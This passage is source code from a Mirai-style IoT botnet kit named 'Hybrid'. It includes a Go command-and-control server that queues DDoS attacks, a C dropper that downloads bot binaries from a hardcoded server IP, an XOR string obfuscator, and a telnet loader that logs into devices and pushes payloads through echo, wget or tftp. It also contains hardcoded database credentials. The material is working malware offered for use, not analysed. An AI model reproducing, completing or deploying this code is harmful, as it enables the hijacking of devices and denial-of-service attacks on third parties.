if durationLimit != 0 && duration > durationLimit { 112 | return false, errors.New(fmt.Sprintf("You may not send attacks longer than %d seconds.", durationLimit)) 113 | } 114 | rows.Close() 115 | 116 | if admin == 0 { 117 | rows, err = this.db.Query("SELECT time_sent, duration FROM history WHERE user_id = ? AND (time_sent + duration + ?) > UNIX_TIMESTAMP()", userId, cooldown) 118 | if err != nil { 119 | fmt.Println(err) 120 | } 121 | if rows.Next() { 122 | var timeSent, historyDuration uint32 123 | rows.Scan(&timeSent, &historyDuration) 124 | return false, errors.New(fmt.Sprintf("Please wait %d seconds before sending another attack", (timeSent + historyDuration + cooldown) - uint32(time.Now().Unix()))) 125 | } 126 | } 127 | 128 | this.db.Exec("INSERT INTO history (user_id, time_sent, duration, command, max_bots) VALUES (?, UNIX_TIMESTAMP(), ?, ?, ?)", userId, duration, fullCommand, maxBots) 129 | return true, nil 130 | } 131 | 132 | func (this *Database) CheckApiCode(apikey string) (bool, AccountInfo) { 133 | rows, err := this.db.Query("SELECT username, max_bots, admin FROM users WHERE api_key = ?", apikey) 134 | if err != nil { 135 | fmt.Println(err) 136 | return false, AccountInfo{"", 0, 0} 137 | } 138 | defer rows.Close() 139 | if !rows.Next() { 140 | return false, AccountInfo{"", 0, 0} 141 | } 142 | var accInfo AccountInfo 143 | rows.Scan(&accInfo.username, &accInfo.maxBots, &accInfo.admin) 144 | return true, accInfo 145 | } 146 | -------------------------------------------------------------------------------- /Hybridd/Hybrid/cnc/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "net" 6 | "errors" 7 | "time" 8 | ) 9 | 10 | const DatabaseAddr string = "127.0.0.1:3306" 11 | const DatabaseUser string = "root" 12 | const DatabasePass string = "root" 13 | const DatabaseTable string = "Apollo" 14 | 15 | var clientList *ClientList = NewClientList() 16 | var database *Database = NewDatabase(DatabaseAddr, DatabaseUser, DatabasePass, DatabaseTable) 17 | 18 | func main() { 19 | tel, err := net.Listen("tcp", "45.77.61.41:666") 20 | if err != nil { 21 | fmt.Println(err) 22 | return 23 | } 24 | 25 | for { 26 | conn, err := tel.Accept() 27 | if err != nil { 28 | break 29 | } 30 | go initialHandler(conn) 31 | } 32 | 33 | fmt.Println("ERROR: run ulimit -n 999999") 34 | } 35 | 36 | func initialHandler(conn net.Conn) { 37 | defer conn.Close() 38 | 39 | conn.SetDeadline(time.Now().Add(10 * time.Second)) 40 | 41 | buf := make([]byte, 32) 42 | l, err := conn.Read(buf) 43 | if err != nil || l <= 0 { 44 | return 45 | } 46 | 47 | if l == 4 && buf[0] == 0x00 && buf[1] == 0x00 && buf[2] == 0x00 { 48 | if buf[3] > 0 { 49 | string_len := make([]byte, 1) 50 | l, err := conn.Read(string_len) 51 | if err != nil || l <= 0 { 52 | return 53 | } 54 | var source string 55 | if string_len[0] > 0 { 56 | source_buf := make([]byte, string_len[0]) 57 | l, err := conn.Read(source_buf) 58 | if err != nil || l <= 0 { 59 | return 60 | } 61 | source = string(source_buf) 62 | } 63 | NewBot(conn, buf[3], source).Handle() 64 | } else { 65 | NewBot(conn, buf[3], "").Handle() 66 | } 67 | } else { 68 | NewAdmin(conn).Handle() 69 | } 70 | } 71 | 72 | 73 | func readXBytes(conn net.Conn, buf []byte) (error) { 74 | tl := 0 75 | 76 | for tl < len(buf) { 77 | n, err := conn.Read(buf[tl:]) 78 | if err != nil { 79 | return err 80 | } 81 | if n <= 0 { 82 | return errors.New("Connection closed unexpectedly") 83 | } 84 | tl += n 85 | } 86 | 87 | return nil 88 | } 89 | 90 | func netshift(prefix uint32, netmask uint8) uint32 { 91 | return uint32(prefix >> (32 - netmask)) 92 | } 93 | -------------------------------------------------------------------------------- /Hybridd/Hybrid/dlr/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | //#include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | #define HTTP_SERVER utils_inet_addr(45,77,61,41) // CHANGE TO YOUR HTTP SERVER IP 9 | 10 | #define EXEC_MSG "NIGGY\n" 11 | #define EXEC_MSG_LEN 6 12 | 13 | #define DOWNLOAD_MSG "RAY\n" 14 | #define DOWNLOAD_MSG_LEN 4 15 | 16 | #define STDIN 0 17 | #define STDOUT 1 18 | #define STDERR 2 19 | 20 | #if BYTE_ORDER == BIG_ENDIAN 21 | #define HTONS(n) (n) 22 | #define HTONL(n) (n) 23 | #elif BYTE_ORDER == LITTLE_ENDIAN 24 | #define HTONS(n) (((((unsigned short)(n) & 0xff)) << 8) | (((unsigned short)(n) & 0xff00) >> 8)) 25 | #define HTONL(n) (((((unsigned long)(n) & 0xff)) << 24) | \ 26 | ((((unsigned long)(n) & 0xff00)) << 8) | \ 27 | ((((unsigned long)(n) & 0xff0000)) >> 8) | \ 28 | ((((unsigned long)(n) & 0xff000000)) >> 24)) 29 | #else 30 | #error "Fix byteorder" 31 | #endif 32 | 33 | #ifdef __ARM_EABI__ 34 | #define SCN(n) ((n) & 0xfffff) 35 | #else 36 | #define SCN(n) (n) 37 | #endif 38 | 39 | inline void run(void); 40 | int sstrlen(char *); 41 | unsigned int utils_inet_addr(unsigned char, unsigned char, unsigned char, unsigned char); 42 | 43 | /* stdlib calls */ 44 | int xsocket(int, int, int); 45 | int xwrite(int, void *, int); 46 | int xread(int, void *, int); 47 | int xconnect(int, struct sockaddr_in *, int); 48 | int xopen(char *, int, int); 49 | int xclose(int); 50 | void x__exit(int); 51 | 52 | #define socket xsocket 53 | #define write xwrite 54 | #define read xread 55 | #define connect xconnect 56 | #define open xopen 57 | #define close xclose 58 | #define __exit x__exit 59 | 60 | void __start(void) 61 | { 62 | #if defined(MIPS) || defined(MIPSEL) 63 | __asm( 64 | ".set noreorder\n" 65 | "move $0, $31\n" 66 | "bal 10f\n" 67 | "nop\n" 68 | "10:\n.cpload $31\n" 69 | "move $31, $0\n" 70 | ".set reorder\n" 71 | ); 72 | #endif 73 | run(); 74 | } 75 | 76 | inline void run(void) 77 | { 78 | char recvbuf[128]; 79 | struct sockaddr_in addr; 80 | int sfd, ffd, ret; 81 | unsigned int header_parser = 0; 82 | int arch_strlen = sstrlen(BOT_ARCH); 83 | 84 | write(STDOUT, EXEC_MSG, EXEC_MSG_LEN); 85 | 86 | addr.sin_family = AF_INET; 87 | addr.sin_port = HTONS(80); 88 | addr.sin_addr.s_addr = HTTP_SERVER; 89 | 90 | ffd = open("ccAD", O_WRONLY | O_CREAT | O_TRUNC, 0777); 91 | 92 | sfd = socket(AF_INET, SOCK_STREAM, 0); 93 | 94 | #ifdef DEBUG 95 | if (ffd == -1) 96 | printf("Failed to open file!\n"); 97 | if (sfd == -1) 98 | printf("Failed to call socket()\n"); 99 | #endif 100 | 101 | if (sfd == -1 || ffd == -1) 102 | __exit(1); 103 | 104 | #ifdef DEBUG 105 | printf("Connecting to host...\n"); 106 | #endif 107 | 108 | if ((ret = connect(sfd, &addr, sizeof (struct sockaddr_in))) < 0) 109 | { 110 | #ifdef DEBUG 111 | printf("Failed to connect to host.\n"); 112 | #endif 113 | write(STDOUT, "YAR\n", 4); 114 | __exit(-ret); 115 | } 116 | 117 | #ifdef DEBUG 118 | printf("Connected to host\n"); 119 | #endif 120 | 121 | if (write(sfd, "GET /AB4g5/Josho." BOT_ARCH " HTTP/1.0\r\n\r\n", 17 + arch_strlen + 13) != (17 + arch_strlen + 13)) 122 | { 123 | #ifdef DEBUG 124 | printf("Failed to send get request.\n"); 125 | #endif 126 | 127 | __exit(3); 128 | } 129 | 130 | #ifdef DEBUG 131 | printf("Started header parse...\n"); 132 | #endif 133 | 134 | while (header_parser != 0x0d0a0d0a) 135 | { 136 | char ch; 137 | int ret = read(sfd, &ch, 1); 138 | 139 | if (ret != 1) 140 | __exit(4); 141 | header_parser = (header_parser << 8) | ch; 142 | } 143 | 144 | #ifdef DEBUG 145 | printf("Finished receiving HTTP header\n"); 146 | #endif 147 | 148 | while (1) 149 | { 150 | int ret = read(sfd, recvbuf, sizeof (recvbuf)); 151 | 152 | if (ret <= 0) 153 | break; 154 | write(ffd, recvbuf, ret); 155 | } 156 | 157 | close(sfd); 158 | close(ffd); 159 | write(STDOUT, DOWNLOAD_MSG, DOWNLOAD_MSG_LEN); 160 | __exit(5); 161 | } 162 | 163 | int sstrlen(char *str) 164 | { 165 | int c = 0; 166 | 167 | while (*str++ != 0) 168 | c++; 169 | return c; 170 | } 171 | 172 | unsigned int utils_inet_addr(unsigned char one, unsigned char two, unsigned char three, unsigned char four) 173 | { 174 | unsigned long ip = 0; 175 | 176 | ip |= (one << 24); 177 | ip |= (two << 16); 178 | ip |= (three << 8); 179 | ip |= (four << 0); 180 | return HTONL(ip); 181 | } 182 | 183 | int xsocket(int domain, int type, int protocol) 184 | { 185 | #if defined(__NR_socketcall) 186 | #ifdef DEBUG 187 | printf("socket using socketcall\n"); 188 | #endif 189 | struct { 190 | int domain, type, protocol; 191 | } socketcall; 192 | socketcall.domain = domain; 193 | socketcall.type = type; 194 | socketcall.protocol = protocol; 195 | 196 | // 1 == SYS_SOCKET 197 | int ret = syscall(SCN(SYS_socketcall), 1, &socketcall); 198 | 199 | #ifdef DEBUG 200 | printf("socket got ret: %d\n", ret); 201 | #endif 202 | return ret; 203 | #else 204 | #ifdef DEBUG 205 | printf("socket using socket\n"); 206 | #endif 207 | return syscall(SCN(SYS_socket), domain, type, protocol); 208 | #endif 209 | } 210 | 211 | int xread(int fd, void *buf, int len) 212 | { 213 | return syscall(SCN(SYS_read), fd, buf, len); 214 | } 215 | 216 | int xwrite(int fd, void *buf, int len) 217 | { 218 | return syscall(SCN(SYS_write), fd, buf, len); 219 | } 220 | 221 | int xconnect(int fd, struct sockaddr_in *addr, int len) 222 | { 223 | #if defined(__NR_socketcall) 224 | #ifdef DEBUG 225 | printf("connect using socketcall\n"); 226 | #endif 227 | struct { 228 | int fd; 229 | struct sockaddr_in *addr; 230 | int len; 231 | } socketcall; 232 | socketcall.fd = fd; 233 | socketcall.addr = addr; 234 | socketcall.len = len; 235 | // 3 == SYS_CONNECT 236 | int ret = syscall(SCN(SYS_socketcall), 3, &socketcall); 237 | 238 | #ifdef DEBUG 239 | printf("connect got ret: %d\n", ret); 240 | #endif 241 | 242 | return ret; 243 | #else 244 | #ifdef DEBUG 245 | printf("connect using connect\n"); 246 | #endif 247 | return syscall(SCN(SYS_connect), fd, addr, len); 248 | #endif 249 | } 250 | 251 | int xopen(char *path, int flags, int other) 252 | { 253 | return syscall(SCN(SYS_open), path, flags, other); 254 | } 255 | 256 | int xclose(int fd) 257 | { 258 | return syscall(SCN(SYS_close), fd); 259 | } 260 | 261 | void x__exit(int code) 262 | { 263 | syscall(SCN(SYS_exit), code); 264 | } 265 | -------------------------------------------------------------------------------- /Hybridd/Hybrid/enc.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | static uint32_t table_key = 0xdedefbaf; 8 | 9 | void *x(void *, int); 10 | 11 | int main(int argc, char **args) 12 | { 13 | void *data; 14 | int len, i; 15 | 16 | if (argc != 3) 17 | { 18 | printf("Usage: %s \n", args[0]); 19 | return 0; 20 | } 21 | 22 | if (strcmp(args[1], "string") == 0) 23 | { 24 | data = args[2]; 25 | len = strlen(args[2]) + 1; 26 | } 27 | else if (strcmp(args[1], "ip") == 0) 28 | { 29 | data = calloc(1, sizeof (uint32_t)); 30 | *((uint32_t *)data) = inet_addr(args[2]); 31 | len = sizeof (uint32_t); 32 | } 33 | else if (strcmp(args[1], "uint32") == 0) 34 | { 35 | data = calloc(1, sizeof (uint32_t)); 36 | *((uint32_t *)data) = htonl((uint32_t)atoi(args[2])); 37 | len = sizeof (uint32_t); 38 | } 39 | else if (strcmp(args[1], "uint16") == 0) 40 | { 41 | data = calloc(1, sizeof (uint16_t)); 42 | *((uint16_t *)data) = htons((uint16_t)atoi(args[2])); 43 | len = sizeof (uint16_t); 44 | } 45 | else if (strcmp(args[1], "uint8") == 0) 46 | { 47 | data = calloc(1, sizeof (uint8_t)); 48 | *((uint8_t *)data) = atoi(args[2]); 49 | len = sizeof (uint8_t); 50 | } 51 | else if (strcmp(args[1], "bool") == 0) 52 | { 53 | data = calloc(1, sizeof (char)); 54 | if (strcmp(args[2], "false") == 0) 55 | ((char *)data)[0] = 0; 56 | else if (strcmp(args[2], "true") == 0) 57 | ((char *)data)[0] = 1; 58 | else 59 | { 60 | printf("Unknown value `%s` for datatype bool!\n", args[2]); 61 | return -1; 62 | } 63 | len = sizeof (char); 64 | } 65 | else 66 | { 67 | printf("Unknown data type `%s`!\n", args[1]); 68 | return -1; 69 | } 70 | 71 | // Yes we are leaking memory, but the program is so 72 | // short lived that it doesn't really matter... 73 | printf("XOR'ing %d bytes of data...\n", len); 74 | data = x(data, len); 75 | for (i = 0; i < len; i++) 76 | printf("\\x%02X", ((unsigned char *)data)[i]); 77 | printf("\n"); 78 | } 79 | 80 | void *x(void *_buf, int len) 81 | { 82 | unsigned char *buf = (char *)_buf, *out = malloc(len); 83 | int i; 84 | uint8_t k1 = table_key & 0xff, 85 | k2 = (table_key >> 8) & 0xff, 86 | k3 = (table_key >> 16) & 0xff, 87 | k4 = (table_key >> 24) & 0xff; 88 | 89 | for (i = 0; i < len; i++) 90 | { 91 | char tmp = buf[i] ^ k1; 92 | 93 | tmp ^= k2; 94 | tmp ^= k3; 95 | tmp ^= k4; 96 | 97 | out[i] = tmp; 98 | } 99 | 100 | return out; 101 | } 102 | -------------------------------------------------------------------------------- /Hybridd/Hybrid/loader/src/binary.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "headers/includes.h" 6 | #include "headers/binary.h" 7 | 8 | static int bin_list_len = 0; 9 | static struct binary **bin_list = NULL; 10 | 11 | BOOL binary_init(void) 12 | { 13 | glob_t pglob; 14 | int i; 15 | 16 | if (glob("bins/dlr.*", GLOB_ERR, NULL, &pglob) != 0) 17 | { 18 | printf("Failed to load from bins folder!\n"); 19 | return; 20 | } 21 | 22 | for (i = 0; i < pglob.gl_pathc; i++) 23 | { 24 | char file_name[256]; 25 | struct binary *bin; 26 | 27 | bin_list = realloc(bin_list, (bin_list_len + 1) * sizeof (struct binary *)); 28 | bin_list[bin_list_len] = calloc(1, sizeof (struct binary)); 29 | bin = bin_list[bin_list_len++]; 30 | 31 | #ifdef DEBUG 32 | printf("(%d/%d) %s is loading...\n", i + 1, pglob.gl_pathc, pglob.gl_pathv[i]); 33 | #endif 34 | strcpy(file_name, pglob.gl_pathv[i]); 35 | strtok(file_name, "."); 36 | strcpy(bin->arch, strtok(NULL, ".")); 37 | load(bin, pglob.gl_pathv[i]); 38 | } 39 | 40 | globfree(&pglob); 41 | return TRUE; 42 | } 43 | 44 | struct binary *binary_get_by_arch(char *arch) 45 | { 46 | int i; 47 | 48 | for (i = 0; i < bin_list_len; i++) 49 | { 50 | if (strcmp(arch, bin_list[i]->arch) == 0) 51 | return bin_list[i]; 52 | } 53 | 54 | return NULL; 55 | } 56 | 57 | static BOOL load(struct binary *bin, char *fname) 58 | { 59 | FILE *file; 60 | char rdbuf[BINARY_BYTES_PER_ECHOLINE]; 61 | int n; 62 | 63 | if ((file = fopen(fname, "r")) == NULL) 64 | { 65 | printf("Failed to open %s for parsing\n", fname); 66 | return FALSE; 67 | } 68 | 69 | while ((n = fread(rdbuf, sizeof (char), BINARY_BYTES_PER_ECHOLINE, file)) != 0) 70 | { 71 | char *ptr; 72 | int i; 73 | 74 | bin->hex_payloads = realloc(bin->hex_payloads, (bin->hex_payloads_len + 1) * sizeof (char *)); 75 | bin->hex_payloads[bin->hex_payloads_len] = calloc(sizeof (char), (4 * n) + 8); 76 | ptr = bin->hex_payloads[bin->hex_payloads_len++]; 77 | 78 | for (i = 0; i < n; i++) 79 | ptr += sprintf(ptr, "\\x%02x", (uint8_t)rdbuf[i]); 80 | } 81 | 82 | return FALSE; 83 | } 84 | -------------------------------------------------------------------------------- /Hybridd/Hybrid/loader/src/headers/binary.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "includes.h" 4 | 5 | #define BINARY_BYTES_PER_ECHOLINE 64 6 | 7 | struct binary { 8 | char arch[6]; 9 | int hex_payloads_len; 10 | char **hex_payloads; 11 | }; 12 | 13 | BOOL binary_init(void); 14 | struct binary *binary_get_by_arch(char *arch); 15 | 16 | static BOOL load(struct binary *bin, char *fname); 17 | -------------------------------------------------------------------------------- /Hybridd/Hybrid/loader/src/headers/connection.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include "includes.h" 6 | #include "telnet_info.h" 7 | 8 | struct connection { 9 | pthread_mutex_t lock; 10 | struct server *srv; 11 | struct binary *bin; 12 | struct telnet_info info; 13 | int fd, echo_load_pos; 14 | time_t last_recv; 15 | enum { 16 | TELNET_CLOSED, // 0 17 | TELNET_CONNECTING, // 1 18 | TELNET_READ_IACS, // 2 19 | TELNET_USER_PROMPT, // 3 20 | TELNET_PASS_PROMPT, // 4 21 | TELNET_WAITPASS_PROMPT, // 5 22 | TELNET_CHECK_LOGIN, // 6 23 | TELNET_VERIFY_LOGIN, // 7 24 | TELNET_PARSE_PS, // 8 25 | TELNET_PARSE_MOUNTS, // 9 26 | TELNET_READ_WRITEABLE, // 10 27 | TELNET_COPY_ECHO, // 11 28 | TELNET_DETECT_ARCH, // 12 29 | TELNET_ARM_SUBTYPE, // 13 30 | TELNET_UPLOAD_METHODS, // 14 31 | TELNET_UPLOAD_ECHO, // 15 32 | TELNET_UPLOAD_WGET, // 16 33 | TELNET_UPLOAD_TFTP, // 17 34 | TELNET_RUN_BINARY, // 18 35 | TELNET_CLEANUP // 19 36 | } state_telnet; 37 | struct { 38 | char data[512]; 39 | int deadline; 40 | } output_buffer; 41 | uint16_t rdbuf_pos, timeout; 42 | BOOL open, success, retry_bin, ctrlc_retry; 43 | uint8_t rdbuf[8192]; 44 | }; 45 | 46 | void connection_open(struct connection *conn); 47 | void connection_close(struct connection *conn); 48 | 49 | int connection_consume_iacs(struct connection *conn); 50 | int connection_consume_login_prompt(struct connection *conn); 51 | int connection_consume_password_prompt(struct connection *conn); 52 | int connection_consume_prompt(struct connection *conn); 53 | int connection_consume_verify_login(struct connection *conn); 54 | int connection_consume_psoutput(struct connection *conn); 55 | int connection_consume_mounts(struct connection *conn); 56 | int connection_consume_written_dirs(struct connection *conn); 57 | int connection_consume_copy_op(struct connection *conn); 58 | int connection_consume_arch(struct connection *conn); 59 | int connection_consume_arm_subtype(struct connection *conn); 60 | int connection_consume_upload_methods(struct connection *conn); 61 | int connection_upload_echo(struct connection *conn); 62 | int connection_upload_wget(struct connection *conn); 63 | int connection_upload_tftp(struct connection *conn); 64 | int connection_verify_payload(struct connection *conn); 65 | int connection_consume_cleanup(struct connection *conn); 66 | 67 | static BOOL can_consume(struct connection *conn, uint8_t *ptr, int amount); 68 | -------------------------------------------------------------------------------- /Hybridd/Hybrid/loader/src/headers/includes.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | #define STDIN 0 6 | #define STDOUT 1 7 | #define STDERR 2 8 | 9 | #define FALSE 0 10 | #define TRUE 1 11 | typedef char BOOL; 12 | 13 | typedef uint32_t ipv4_t; 14 | typedef uint16_t port_t; 15 | 16 | #define LOADER_LITTLE_ENDIAN 17 | 18 | #define ATOMIC_ADD(ptr,i) __sync_fetch_and_add((ptr),i) 19 | #define ATOMIC_SUB(ptr,i) __sync_fetch_and_sub((ptr),i) 20 | #define ATOMIC_INC(ptr) ATOMIC_ADD((ptr),1) 21 | #define ATOMIC_DEC(ptr) ATOMIC_SUB((ptr),1) 22 | #define ATOMIC_GET(ptr) ATOMIC_ADD((ptr),0) 23 | 24 | #define VERIFY_STRING_HEX "\\x6b\\x61\\x6d\\x69" 25 | #define VERIFY_STRING_CHECK "kami" 26 | 27 | #define TOKEN_QUERY "/bin/busybox iDdosYou" 28 | #define TOKEN_RESPONSE "iDdosYou: applet not found" 29 | 30 | #define EXEC_QUERY "/bin/busybox AndSm0keDoinks" 31 | #define EXEC_RESPONSE "AndSm0keDoinks: applet not found" 32 | 33 | #define FN_DROPPER "aupnpb" 34 | #define FN_BINARY "ccAD" 35 | 36 | extern char *id_tag; 37 | -------------------------------------------------------------------------------- /Hybridd/Hybrid/loader/src/headers/server.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include "includes.h" 5 | #include "telnet_info.h" 6 | #include "connection.h" 7 | 8 | struct server { 9 | uint32_t max_open; 10 | volatile uint32_t curr_open; 11 | volatile uint32_t total_input, total_logins, total_echoes, total_wgets, total_tftps, total_successes, total_failures; 12 | char *wget_host_ip, *tftp_host_ip; 13 | struct server_worker *workers; 14 | struct connection **estab_conns; 15 | ipv4_t *bind_addrs; 16 | pthread_t to_thrd; 17 | port_t wget_host_port; 18 | uint8_t workers_len, bind_addrs_len; 19 | int curr_worker_child; 20 | }; 21 | 22 | struct server_worker { 23 | struct server *srv; 24 | int efd; // We create a separate epoll context per thread so thread safety isn't our problem 25 | pthread_t thread; 26 | uint8_t thread_id; 27 | }; 28 | 29 | struct server *server_create(uint8_t threads, uint8_t addr_len, ipv4_t *addrs, uint32_t max_open, char *wghip, port_t wghp, char *thip); 30 | void server_destroy(struct server *srv); 31 | void server_queue_telnet(struct server *srv, struct telnet_info *info); 32 | void server_telnet_probe(struct server *srv, struct telnet_info *info); 33 | 34 | static void bind_core(int core); 35 | static void *worker(void *arg); 36 | static void handle_output_buffers(struct server_worker *); 37 | static void handle_event(struct server_worker *wrker, struct epoll_event *ev); 38 | static void *timeout_thread(void *); 39 | -------------------------------------------------------------------------------- /Hybridd/Hybrid/loader/src/headers/telnet_info.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "includes.h" 4 | 5 | struct telnet_info { 6 | char user[32], pass[32], arch[6], writedir[32]; 7 | ipv4_t addr; 8 | port_t port; 9 | enum { 10 | UPLOAD_ECHO, 11 | UPLOAD_WGET, 12 | UPLOAD_TFTP 13 | } upload_method; 14 | BOOL has_auth, has_arch; 15 | }; 16 | 17 | struct telnet_info *telnet_info_new(char *user, char *pass, char *arch, ipv4_t addr, port_t port, struct telnet_info *info); 18 | struct telnet_info *telnet_info_parse(char *str, struct telnet_info *out); 19 | -------------------------------------------------------------------------------- /Hybridd/Hybrid/loader/src/headers/util.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "server.h" 4 | #include "includes.h" 5 | 6 | #define BUFFER_SIZE 4096 7 | 8 | #define EI_NIDENT 16 // Side of e_ident in elf header 9 | #define EI_DATA 5 // Offset endianness in e_ident 10 | 11 | #define EE_NONE 0 // No endianness ???? 12 | #define EE_LITTLE 1 // Little endian 13 | #define EE_BIG 2 // Big endian 14 | 15 | #define ET_NOFILE 0 // None 16 | #define ET_REL 1 // Relocatable file 17 | #define ET_EXEC 2 // Executable file 18 | #define ET_DYN 3 // Shared object file 19 | #define ET_CORE 4 // Core file 20 | 21 | /* These constants define the various ELF target machines */ 22 | #define EM_NONE 0 23 | #define EM_M32 1 24 | #define EM_SPARC 2 25 | #define EM_386 3 26 | #define EM_68K 4 // m68k 27 | #define EM_88K 5 // m68k 28 | #define EM_486 6 // x86 29 | #define EM_860 7 // Unknown 30 | #define EM_MIPS 8 /* MIPS R3000 (officially, big-endian only) */ 31 | /* Next two are historical and binaries and 32 | modules of these types will be rejected by 33 | Linux. */ 34 | #define EM_MIPS_RS3_LE 10 /* MIPS R3000 little-endian */ 35 | #define EM_MIPS_RS4_BE 10 /* MIPS R4000 big-endian */ 36 | 37 | #define EM_PARISC 15 /* HPPA */ 38 | #define EM_SPARC32PLUS 18 /* Sun's "v8plus" */ 39 | #define EM_PPC 20 /* PowerPC */ 40 | #define EM_PPC64 21 /* PowerPC64 */ 41 | #define EM_SPU 23 /* Cell BE SPU */ 42 | #define EM_ARM 40 /* ARM 32 bit */ 43 | #define EM_SH 42 /* SuperH */ 44 | #define EM_SPARCV9 43 /* SPARC v9 64-bit */ 45 | #define EM_H8_300 46 /* Renesas H8/300 */ 46 | #define EM_IA_64 50 /* HP/Intel IA-64 */ 47 | #define EM_X86_64 62 /* AMD x86-64 */ 48 | #define EM_S390 22 /* IBM S/390 */ 49 | #define EM_CRIS 76 /* Axis Communications 32-bit embedded processor */ 50 | #define EM_M32R 88 /* Renesas M32R */ 51 | #define EM_MN10300 89 /* Panasonic/MEI MN10300, AM33 */ 52 | #define EM_OPENRISC 92 /* OpenRISC 32-bit embedded processor */ 53 | #define EM_BLACKFIN 106 /* ADI Blackfin Processor */ 54 | #define EM_ALTERA_NIOS2 113 /* Altera Nios II soft-core processor */ 55 | #define EM_TI_C6000 140 /* TI C6X DSPs */ 56 | #define EM_AARCH64 183 /* ARM 64 bit */ 57 | #define EM_TILEPRO 188 /* Tilera TILEPro */ 58 | #define EM_MICROBLAZE 189 /* Xilinx MicroBlaze */ 59 | #define EM_TILEGX 191 /* Tilera TILE-Gx */ 60 | #define EM_FRV 0x5441 /* Fujitsu FR-V */ 61 | #define EM_AVR32 0x18ad /* Atmel AVR32 */ 62 | 63 | struct elf_hdr { 64 | uint8_t e_ident[EI_NIDENT]; 65 | uint16_t e_type, e_machine; 66 | uint32_t e_version; 67 | } __attribute__((packed)); 68 | 69 | int util_socket_and_bind(struct server *srv); 70 | int util_memsearch(char *buf, int buf_len, char *mem, int mem_len); 71 | int util_printfile(char *data, char *file); 72 | BOOL util_sockprintf(int fd, const char *fmt, ...); 73 | char *util_trim(char *str); 74 | -------------------------------------------------------------------------------- /Hybridd/Hybrid/loader/src/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include "headers/includes.h" 10 | #include "headers/server.h" 11 | #include "headers/telnet_info.h" 12 | #include "headers/binary.h" 13 | #include "headers/util.h" 14 | 15 | static void *stats_thread(void *); 16 | 17 | static struct server *srv; 18 | 19 | char *id_tag = "selfrep"; 20 | 21 | int main(int argc, char **args) 22 | { 23 | pthread_t stats_thrd; 24 | uint8_t addrs_len; 25 | ipv4_t *addrs; 26 | uint32_t total = 0; 27 | struct telnet_info info; 28 | addrs_len = 2; 29 | addrs = calloc(addrs_len, sizeof (ipv4_t)); 30 | addrs[0] = inet_addr("45.77.61.41"); // Address to bind to 31 | addrs[1] = inet_addr("45.77.61.41"); // Address to bind to 32 | if (argc == 2) 33 | { 34 | id_tag = args[1]; 35 | } 36 | 37 | if (!binary_init()) 38 | { 39 | printf("Failed to load bins/dlr.* as dropper\n"); 40 | return 1; 41 | } 42 | if ((srv = server_create(sysconf(_SC_NPROCESSORS_ONLN), addrs_len, addrs, 1024 * 64, "45.77.61.41", 80, "45.77.61.41")) == NULL) 43 | { 44 | printf("Failed to initialize server. Aborting\n"); 45 | return 1; 46 | } 47 | pthread_create(&stats_thrd, NULL, stats_thread, NULL); 48 | // Read from stdin 49 | while (TRUE) 50 | { 51 | char strbuf[1024]; 52 | 53 | if (fgets(strbuf, sizeof (strbuf), stdin) == NULL) 54 | break; 55 | 56 | util_trim(strbuf); 57 | 58 | if (strlen(strbuf) == 0) 59 | { 60 | usleep(10000); 61 | continue; 62 | } 63 | 64 | memset(&info, 0, sizeof(struct telnet_info)); 65 | if (telnet_info_parse(strbuf, &info) == NULL) 66 | printf(""); 67 | else 68 | { 69 | if (srv == NULL) 70 | printf("srv == NULL 2\n"); 71 | 72 | server_queue_telnet(srv, &info); 73 | if (total++ % 1000 == 0) 74 | sleep(1); 75 | } 76 | 77 | ATOMIC_INC(&srv->total_input); 78 | } 79 | 80 | printf("Hit end of input.\n"); 81 | 82 | while(ATOMIC_GET(&srv->curr_open) > 0) 83 | sleep(1); 84 | 85 | return 0; 86 | } 87 | 88 | static void *stats_thread(void *arg) 89 | { 90 | uint32_t seconds = 0; 91 | 92 | while (TRUE) 93 | { 94 | #ifndef DEBUG 95 | printf("\033[0mTime: \033[90m[\033[96m%ds\033[90m] \033[91m|| \033[0mConns: \033[90m[\033[96m%d\033[90m] \033[91m|| \033[0mLogins: \033[90m[\033[96m%d\033[90m] \033[91m|| \033[0mRan: \033[90m[\033[96m%d\033[90m] \033[91m|| \033[0mEchoes: \033[90m[\033[96m%d\033[90m] \033[91m|| \033[0mWgets: \033[90m[\033[96m%d\033[90m] \033[91m|| \033[0mTFTPs: \033[90m[\033[96m%d\033[90m]\n", seconds++, ATOMIC_GET(&srv->curr_open), ATOMIC_GET(&srv->total_logins), ATOMIC_GET(&srv->total_successes), ATOMIC_GET(&srv->total_echoes), ATOMIC_GET(&srv->total_wgets), ATOMIC_GET(&srv->total_tftps)); 96 | #endif 97 | fflush(stdout); 98 | sleep(1); 99 | } 100 | } 101 | -------------------------------------------------------------------------------- /Hybridd/Hybrid/loader/src/telnet_info.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "headers/includes.h" 6 | #include "headers/telnet_info.h" 7 | 8 | struct telnet_info *telnet_info_new(char *user, char *pass, char *arch, ipv4_t addr, port_t port, struct telnet_info *info) 9 | { 10 | if (user != NULL) 11 | strcpy(info->user, user); 12 | if (pass != NULL) 13 | strcpy(info->pass, pass); 14 | if (arch != NULL) 15 | strcpy(info->arch, arch); 16 | info->addr = addr; 17 | info->port = port; 18 | 19 | info->has_auth = user != NULL || pass != NULL; 20 | info->has_arch = arch != NULL; 21 | 22 | return info; 23 | } 24 | 25 | struct telnet_info *telnet_info_parse(char *str, struct telnet_info *out) // Format: ip:port user:pass arch 26 | { 27 | char *conn, *auth, *arch; 28 | char *addr_str, *port_str, *user = NULL, *pass = NULL; 29 | ipv4_t addr; 30 | port_t port; 31 | 32 | if 